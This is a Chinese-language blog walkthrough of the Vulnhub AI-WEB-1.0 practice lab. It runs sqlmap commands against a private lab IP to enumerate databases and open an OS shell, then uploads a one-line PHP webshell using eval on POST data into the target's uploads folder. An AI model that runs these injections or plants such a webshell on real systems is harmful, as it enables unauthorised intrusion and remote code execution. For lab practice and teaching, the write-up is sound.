当前位置: 首页 > news >正文

【Vulnhub靶场AI-WEB-1.0打靶教程】

news 2025/7/15 21:07:34

 第一步:查看虚拟机的ip

第二步:扫描ip下开放的80端口

第三步:扫描查到的ip地址下的目录

第四步:访问查到的目录

访问robot.txt

第五步:访问robot.txt显示出的目录

第六步:打开kali终端,使用sqlmap功能

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs --batch

 查到数据库名

 进行os-shell连接

sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --os-shell

在kali里面/home/kali/目录下创建一个1.php写入一句话木马。语句如下:

<?php @eval($_POST['pass']);?>

 再打开一个终端页面输入命令

sqlmap -u "http://192.168.189.153/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php

 然后返回之前的终端页面输入命令ls查看目录,看到了木马文件上传成功

 

第七步:打卡蚁剑访问即可

http://www.lryc.cn/news/411625.html

相关文章:

  • html实现酷炫美观的可视化大屏(十种风格示例,附源码)
  • 【C++BFS算法 二分查找】2812. 找出最安全路径
  • 轻触开关 KH-4.5X4.5X5.5H-STM
  • 3.redis客户端
  • Rust配置国内源,解决安装依赖慢问题
  • AI学习指南机器学习篇- Q学习的参数与调优
  • 《小迪安全》学习笔记02
  • C语言:自定义类型进阶(结构体、联合体、枚举)
  • SPSSAU | 最好最差权重BWM原理及案例实操分析
  • docker安装elasticsearch(es)最新版本
  • 02 RabbitMQ:下载安装
  • mmcv库出现No module named ‘mmcv._ext
  • 防止xss(跨站脚本攻击)
  • django小型超市库存与销售管理系统-计算机毕业设计源码46608
  • 项目实战_表白墙(简易版)
  • 优化 Spring Boot 项目启动速度:高效管理大量 Bean 注入
  • 《LeetCode热题100》---<5.普通数组篇六道>
  • 【Hot100】LeetCode—169. 多数元素
  • 专科、本科、研究生是按照什么分类的?
  • 关于实时ODS层数仓搭建的三个问题
  • 微信仿H5支付是什么
  • 网络安全知识竞赛规则及流程方案
  • 赞!蚓链用数字化打造助农扶农电商平台!
  • RocketMQ延时消息
  • 【C++/STL】:哈希的应用 -- 位图布隆过滤器
  • 非线性面板数据实证模型及 Stata 具体操作步骤
  • 视角 | 麻省理工学院提出出温度计校准法,专治AI大模型过度自信
  • 昇思25天学习打卡营第XX天|CycleGAN图像风格迁移互换
  • 嵌入式Linux学习: interrupt实验
  • GPT-4o mini 来袭:开发者如何驾驭新一代AI模型?